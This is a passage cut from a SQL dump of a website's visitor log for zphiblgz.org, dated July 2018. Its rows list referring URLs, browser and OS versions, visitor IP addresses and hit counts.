JsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Ym9tODFwWDQxbjhTVTRabW10SlhtYWhiRFJqZlBkZERnWW9kVmFDbE9kdyws&sign=55c549d8d257e48a5341147e321fc5b6&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.254.86.52','000',2,0),(33913,'2018-07-28','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1862.b2cZ7Ip6Npdm8g_IWlEH3YEfqMJvYoGrlD59OoZ8V3g.261920973bbb770b4202924635260970293b8090&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040eTY2MDFhaTFPYUxNWm8yNTR4eUdJaVdXdjRlcUc2NDBaNzB6SGlRamVoQSws&sign=0ddc5283ff67aa4e0ed6562b5f9456b6&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','77.73.70.129','000',2,0),(33914,'2018-07-28','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(33915,'2018-07-28','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(33916,'2018-07-28','http://pornoelita.info/','Opera','Windows','7.54','','46.118.125.157','000',2,0),(33917,'2018-07-28','https://zphiblgz.org','Safari','Linux','47.18.3','','34.214.109.24','000',1,0),(33918,'2018-07-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.104','000',1,0),(33919,'2018-07-28','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.30','000',1,0),(33920,'2018-07-28','https://zphiblgz.org','Firefox','Windows','40.1','','92.151.12.212','000',2,0),(33921,'2018-07-28','http://www.rospromtest.ru/','Opera','Windows','7.11','','5.248.253.117','000',3,0),(33922,'2018-07-28','http://snabs.kz/','Opera','Windows','7.60','','178.137.94.200','000',2,0),(33923,'2018-07-28','http://zphiblgz.org/','Firefox','Windows','27.0','','193.169.252.46','000',3,0),(33924,'2018-07-28','https://zphiblgz.org','Firefox','Windows','19.0','','185.220.101.33','000',1,0),(33925,'2018-07-28','https://zphiblgz.org','Firefox','Windows','19.0','','204.85.191.31','000',1,0),(33926,'2018-07-28','https://zphiblgz.org','Firefox','Windows','19.0','','51.15.233.253','000',10,0),(33927,'2018-07-28','https://zphiblgz.org','Firefox','Windows','50.0','','88.235.53.85','000',1,0),(33928,'2018-07-28','https://zphiblgz.org/','Opera Next','Windows','49.0.2725.47','','64.85.24.24','000',2,0),(33929,'2018-07-28','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(33930,'2018-07-28','http://site.ru','Chrome','Windows','5.0.375.99','','85.233.160.31','000',1,0),(33931,'2018-07-28','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(33932,'2018-07-28','https://zphiblgz.org','Safari','Macintosh','11.1.1','','71.179.15.195','000',3,0),(33933,'2018-07-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(33934,'2018-07-28','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(33935,'2018-07-28','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(33936,'2018-07-28','https://zphiblgz.org/service/youth/','AppleWebKit','Windows','534','','40.77.190.77','000',1,0),(33937,'2018-07-28','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.190.66','000',1,0),(33938,'2018-07-28','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','178.175.129.91','000',1,0),(33939,'2018-07-28','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',2,0),(33940,'2018-07-28','https://www.google.com/','Safari','Macintosh','11.1','','73.135.246.39','000',2,0),(33941,'2018-07-28','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.28','000',1,0),(33942,'2018-07-28','http://www.zphibmaryland.org/chapters/','Safari','iPad','11.0','','98.233.124.15','000',3,0),(33943,'2018-07-28','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.29','000',1,0),(33944,'2018-07-28','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.137.218','000',2,0),(33945,'2018-07-29','https://zphiblgz.org','Firefox','Windows','40.1','','181.74.226.53','000',2,0),(33946,'2018-07-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.227.114.236','000',4,0),(33947,'2018-07-29','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.29','000',1,0),(33948,'2018-07-29','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(33949,'2018-07-29','https://zphiblgz.org','Firefox','Linux','21.0','','188.165.233.34','000',2,0),(33950,'2018-07-29','https://zphiblgz.org','MSIE','Windows','11.0','','52.173.241.248','000',1,0),(33951,'2018-07-29','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.28','000',1,0),(33952,'2018-07-29','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(33953,'2018-07-29','http://site.ru','Chrome','Windows','5.0.375.99','','85.233.160.31','000',1,0),(33954,'2018-07-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1863.MOdURwlcem19UASI38oTXPF1MJRryvKFemi3nzEE_YU.0dabd2a981fdb61f30090684ecb1ce04df7eff6c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Yk9ENnZoRGVlTDNqMkVyR0NBMUpsUFo4UzNTcVMxbWhKOXA4Vmp3clVVQSws&sign=06d64d9cf64ec196c4f309424daa10bf&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.18.201','000',2,0),(33955,'2018-07-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1863.9JgLU2L5G4KCFKhpSlefLFvLWtu-3-DJWLVwe_LZ47Q.58cca57370d8914f67764c37e8c85ac1f152e821&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043bl9rMHRsQUlpX0dsUmhUUkRKNkg2MGJvZEI0MkZUN1dKWGFwdUg5YlF4QSws&sign=b6f566c72ba46bd181d0324b2e7128e6&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','5.196.45.165','000',2,0),(33956,'2018-07-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1863.H84PC57bXi3kW0wOLP6buqtH9Hc8GogD5b95WNMcwwY.b7993cd4b42d38c7b2aae942a79182a1de5ebfb1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041WVoxVDRITjhIc3RDcktjT1hlSk55RGQxWFlJTzgwNkNHMHhHODgwclJMdyws&sign=5ab17b91da5b436359ec5008e0d38e0c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','5.135.10.115','000',2,0),(33957,'2018-07-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1863.Y4lMEH3-xnlgLR7eREacE5RbLRUYNQWaB6Ndu1-eI18.9fb450c49197abad949f82be605673bd02a43456&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043a3FkZ2pVSlFkUEtEeWxuNnVuRnE2b2JoNmJoRklCVmQ0ZHhJT3RFYTFjZyws&sign=06359e674525dd37a1df849bca547f28&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.79.147.224','000',2,0),(33958,'2018-07-29','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1863.vaqj1BXomgZdaPnmFc4lWSGb1ZVfgRxS76Nd3gX3TME.c71f746a1a2d1c1e485db585942bdb0d0fbd18c6&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040UkJIRk1kczZhTWI4Z01LcEY2RlRFZGFfZ1hCakxNYlBOeTdBQ3B6UlRFdyws&sign=c3f4f1602f9706f4f764d3d600fd28f2&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','77.73.70.129','000',2,0),(33959,'2018-07-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1863.4xjlrkegUc9VCg7fwpP6gObDzKEDG0MWcjZg4yFOEaw.177b0916ef864dcf5834bfb17e4fc8c41ab412a0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041NkRrSDZfX1VXYlV6c3hBS3Y4NXJUWER5RHphUVhsZkpiS1I4TTNRNHUwQSws&sign=a145733ac211b6ad8ac550b0fe4075db&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.46.90','000',2,0),(33960,'2018-07-29','http://site.ru','Chrome','Windows','5.0.375.99','','83.170.125.28','000',2,0),(33961,'2018-07-29','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.27','000',1,0),(33962,'2018-07-29','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.31','000',2,0),(33963,'2018-07-29','https://zphiblgz.org','Chrome','Windows','33.0.1750.154','','45.40.166.169','000',1,0),(33964,'2018-07-29','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(33965,'2018-07-29','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.28','000',1,0),(33966,'2018-07-29','http://zphiblgz.org/wp-content/test.php','MSIE','Windows','6.0','','14.235.156.245','000',1,0),(33967,'2018-07-29','https://zphiblgz.org','Chrome','Windows','52.0.2780.42','','104.227.54.158','000',1,0),(33968,'2018-07-29','https://zphiblgz.org','Firefox','Windows','50.0','','88.235.53.85','000',1,0),(33969,'2018-07-29','android-app://com.google.android.googlequicksearchbox','Chrome','Android','67.0.3396.87','','66.87.148.230','000',2,0),(33970,'2018-07-29','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(33971,'2018-07-29','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.30','000',1,0),(33972,'2018-07-29','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','46.118.112.85','000',2,0),(33973,'2018-07-29','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','65.19.167.130','000',1,0),(33974,'2018-07-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(33975,'2018-07-29','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.98','000',1,0),(33976,'2018-07-29','https://zphiblgz.org/service/','AppleWebKit','Windows','534','','40.77.190.97','000',1,0),(33977,'2018-07-29','https://zphiblgz.org','Safari','Macintosh','11.0.2','','78.46.94.83','000',1,0),(33978,'2018-07-29','https://zphiblgz.org','Firefox','Macintosh','59.0','','64.246.165.210','000',2,0),(33979,'2018-07-29','https://zphiblgz.org/','Firefox','Windows','57.0','','64.85.24.24','000',2,0),(33980,'2018-07-29','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.101','000',3,0),(33981,'2018-07-29','https://zphiblgz.org','MSIE','Windows','11.0','','192.95.30.29','000',2,0),(33982,'2018-07-29','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.35','000',1,0),(33983,'2018-07-29','http://site.ru','Chrome','Windows','5.0.375.99','','95.173.185.220','000',1,0),(33984,'2018-07-29','https://zphiblgz.org','Firefox','Linux','5.0','','46.105.98.166','000',29,0),(33985,'2018-07-29','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(33986,'2018-07-29','https://zphiblgz.org','Firefox','Windows','40.1','','189.216.87.20','000',2,0),(33987,'2018-07-29','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.226.44','000',2,0),(33988,'2018-07-29','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.31','000',1,0),(33989,'2018-07-30','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','23.129.64.104','000',2,0),(33990,'2018-07-30','https://zphiblgz.org','Firefox','Windows','40.1','','203.106.57.77','000',2,0),(33991,'2018-07-30','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.27','000',1,0),(33992,'2018-07-30','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.27','000',1,0),(33993,'2018-07-30','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(33994,'2018-07-30','http://site.ru','Chrome','Windows','5.0.375.99','','69.174.115.201','000',2,0),(33995,'2018-07-30','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.27','000',1,0),(33996,'2018-07-30','https://zphiblgz.org','Chrome','Macintosh','67.0.3396.87','','166.62.126.3','000',2,0),(33997,'2018-07-30','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(33998,'2018-07-30','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(33999,'2018-07-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','108.167.136.232','000',2,0),(34000,'2018-07-30','https://zphiblgz.org','Firefox','Windows','40.1','','61.1.210.68','000',2,0),(34001,'2018-07-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1864.9YrixLoqBioF_GJELCgXyoBhu0VeTa9nvKHRKj5PXjU.681abf4c884c76876d0bac6fe30f13c330ad3fe7&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043ZGZ0Tzd6TGIwRTQ0UWIxREpWdFNVQ25ZbWZTTWZpaFliaENpUUFreEJsdyws&sign=df40d5ecd5f2766e565fb212eb889ad0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.35.92','000',2,0),(34002,'2018-07-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1864.J--r4BnW71Xn4ee7BpQdkSiDMCBQAmaj-sFfMCfr5wU.8d2aad4762fe3ce6aa1685d97b635c224c6faac3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042YWNScUV6Rnp2RFNqZzJ1SXlZQmRZTG9kRlhhUk01U0tZNk82amZEbU1zZyws&sign=655b3ae874dbe08bc3cec939eca49dff&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.74.31','000',2,0),(34003,'2018-07-30','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1864.2qgJI3s4wjDpRnI90rHvUeipkBXWXP3dsXaAe_z1i-A.29402613b30ab2682002859d0a86e3e77f1b3933&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ekRTSTFhYUZpOUpxRXVCcVNkVlJ0V3RtWmgxdkNLWDZRTF9nSWFraWRJZyws&sign=ffe915f63fdd3ee4a842f8e0e1ed95d7&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','77.73.70.135','000',2,0),(34004,'2018-07-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1864.aWDBSnLUTl1RJMvwviuHA2MYzOakeSDSMXjqd1R5bGA.143412eea7bb55a0684fdc627fe89da53ee15715&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041SUVqLS0xYkhjZDIzM2FQSzh0VXZLWFdBdUY4OVhMWWktMGF4bFFvNTBSdyws&sign=116f8f50c396144e7d56f50a260b8a3a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.189.44','000',2,0),(34005,'2018-07-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1864.4Jc1DjvQa0Y65fedPBjBh4y89jdixIGmoOxeW2VlX4I.e55fe7f00d61293d42e67b80da706738f5919b5f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043UXpTZkRfdFJ5c3QzQVpOZ3BoUW9tRW42T3hGeWZLM3ViZFR5Wlo0VklmZyws&sign=ceb438b8d7e508c2201377e25ace9989&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.254.86.52','000',2,0),(34006,'2018-07-30','https://zphiblgz.org','Firefox','Windows','40.1','','82.46.160.54','000',2,0),(34007,'2018-07-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1864.F0_gKv7IlkeGe86z0tSjv6Rrx-CGqGCoucBFum6jt3c.b7042ce4a017ff63c660eda4bdd16558d29e5e53&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043VlNEUUhvcDJqcUZQcFczZi0tdkJYYVJ3amJDVlZ5OTluTGlmT1lQTUFoUSws&sign=f0806515106d4b819ace1a0691247ff5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.1.194','000',2,0),(34008,'2018-07-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1864.RsrPHKizAILFm0926GSS_aaKcDNj3MC4Vk8IqkGnl78.04c3e32749d6c4005792514c46245149d53e36c2&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041aDdQanpLSFVreUtJYnhaRXdNZ0F0dHpLSzluU2RDMXhpSk43VzdlVmktQSws&sign=1d5d6694126128cef3ba5b73e15ecb4f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','207.148.74.254','000',2,0),(34009,'2018-07-30','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.30','000',1,0),(34010,'2018-07-30','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.149','000',1,0),(34011,'2018-07-30','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.11','000',2,0),(34012,'2018-07-30','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','95.174.64.114','000',3,0),(34013,'2018-07-30','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(34014,'2018-07-30','https://zphiblgz.org','Chrome','Linux','37.3.16','','34.210.250.80','000',1,0),(34015,'2018-07-30','https://zphiblgz.org','Firefox','Windows','1.25','','34.210.250.80','000',2,0),(34016,'2018-07-30','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(34017,'2018-07-30','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(34018,'2018-07-30','https://zphiblgz.org','Firefox','Windows','40.1','','114.124.212.113','000',1,0),(34019,'2018-07-30','https://zphiblgz.org','Firefox','Windows','40.1','','114.124.211.226','000',1,0),(34020,'2018-07-30','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.69.208','000',1,0),(34021,'2018-07-30','https://zphiblgz.org','Opera','Unknown','9.15','','87.106.48.6','000',1,0),(34022,'2018-07-30','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','46.101.80.192','000',3,0),(34023,'2018-07-30','https://zphiblgz.org','Safari','Macintosh','11.1.1','','71.179.15.195','000',2,0),(34024,'2018-07-30','https://zphiblgz.org/service/breakfastonthego/','AppleWebKit','Windows','534','','40.77.194.63','000',1,0),(34025,'2018-07-30','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(34026,'2018-07-30','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',2,0),(34027,'2018-07-30','http://zphiblgz.org/download/aarc/','Firefox','Windows','44.0','','195.184.208.196','000',1,0),(34028,'2018-07-30','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(34029,'2018-07-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(34030,'2018-07-30','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.31','000',1,0),(34031,'2018-07-30','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(34032,'2018-07-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.60.100.243','000',1,0),(34033,'2018-07-30','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.50.242.125','000',3,0),(34034,'2018-07-30','http://zphiblgz.org/','Opera Next','Windows','45.0.2552.812','','163.172.4.153','000',1,0),(34035,'2018-07-30','https://zphiblgz.org/','Chrome','Macintosh','57.0.2987.133','','163.172.4.153','000',1,0),(34036,'2018-07-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(34037,'2018-07-30','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.31','000',1,0),(34038,'2018-07-30','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','51.15.86.162','000',1,0),(34039,'2018-07-30','http://site.ru','Chrome','Windows','5.0.375.99','','78.4.254.171','000',2,0),(34040,'2018-07-30','http://site.ru','Chrome','Windows','5.0.375.99','','178.208.34.202','000',1,0),(34041,'2018-07-30','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.28','000',1,0),(34042,'2018-07-30','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.41','000',2,0),(34043,'2018-07-30','https://zphiblgz.org','Chrome','Windows','58.0.3029.96','','39.104.118.143','000',3,0),(34044,'2018-07-30','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.227.36.51','000',1,0),(34045,'2018-07-30','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.231.204.193','000',3,0),(34046,'2018-07-30','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.10.47','000',2,0),(34047,'2018-07-30','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.229.29.8','000',3,0),(34048,'2018-07-31','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.229.29.8','000',9,0),(34049,'2018-07-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',1,0),(34050,'2018-07-31','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.227.40.26','000',41,0),(34051,'2018-07-31','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.190.36','000',1,0),(34052,'2018-07-31','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.231.62.198','000',24,0),(34053,'2018-07-31','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(34054,'2018-07-31','https://zphiblgz.org','Firefox','Windows','40.1','','117.204.104.24','000',2,0),(34055,'2018-07-31','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.28','000',1,0),(34056,'2018-07-31','http://zphiblgz.org/','MSIE','Windows','6.0','','185.38.216.107','000',2,0),(34057,'2018-07-31','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.231.12.66','000',22,0),(34058,'2018-07-31','https://zphiblgz.org','Firefox','Windows','40.1','','112.198.215.165','000',2,0),(34059,'2018-07-31','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',1,0),(34060,'2018-07-31','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(34061,'2018-07-31','https://zphiblgz.org/ts_teams/christopher-flowers/','AppleWebKit','Windows','534','','40.77.188.137','000',1,0),(34062,'2018-07-31','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.37','000',1,0),(34063,'2018-07-31','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.139','000',1,0),(34064,'2018-07-31','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.87.233.140','000',1,0),(34065,'2018-07-31','http://zphiblgz.org/cache/v12/get_started','MSIE','Windows','8.0','','92.23.62.153','000',2,0),(34066,'2018-07-31','http://zphiblgz.org/cache/v12/get_started','Safari','iPhone','11.0','','172.111.195.205','000',2,0),(34067,'2018-07-31','https://zphiblgz.org/cache/v12/get_started','Firefox','Windows','61.0','','46.101.94.163','000',3,0),(34068,'2018-07-31','http://zphiblgz.org/cache/v12/get_started','Safari','iPhone','10.0','','45.74.4.106','000',2,0),(34069,'2018-07-31','http://zphiblgz.org/cache/v12/get_started','SamsungBrowser','Android','5.2','','45.74.4.106','000',1,0),(34070,'2018-07-31','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.227.46.167','000',49,0),(34071,'2018-07-31','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',2,0),(34072,'2018-07-31','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.27','000',1,0),(34073,'2018-07-31','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.27','000',1,0),(34074,'2018-07-31','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.31','000',1,0),(34075,'2018-07-31','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.31','000',1,0),(34076,'2018-07-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1865.ibALwZXCF_p2DEOEUsHuimUvcAThzAczLF9XCCSbzNw.ddf83a773dc1ad9cca77dcc52d959ffb400272b3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043SGhUd2k4Y2xOQmdaZkNMLXJtdVJ1aE1UN0Z0OWNhN3RYY19XNWhtNnYydyws&sign=200241e19cc454d47908bb1045c77f69&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.162.191','000',2,0),(34077,'2018-07-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1865.CG5EudDqR4wJMUWEmWlHRnR8SjwCs0Ej70l8NxcIOt8.cc5f4552c57c8f6502e81d90419c4f9bf9022bf7&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SW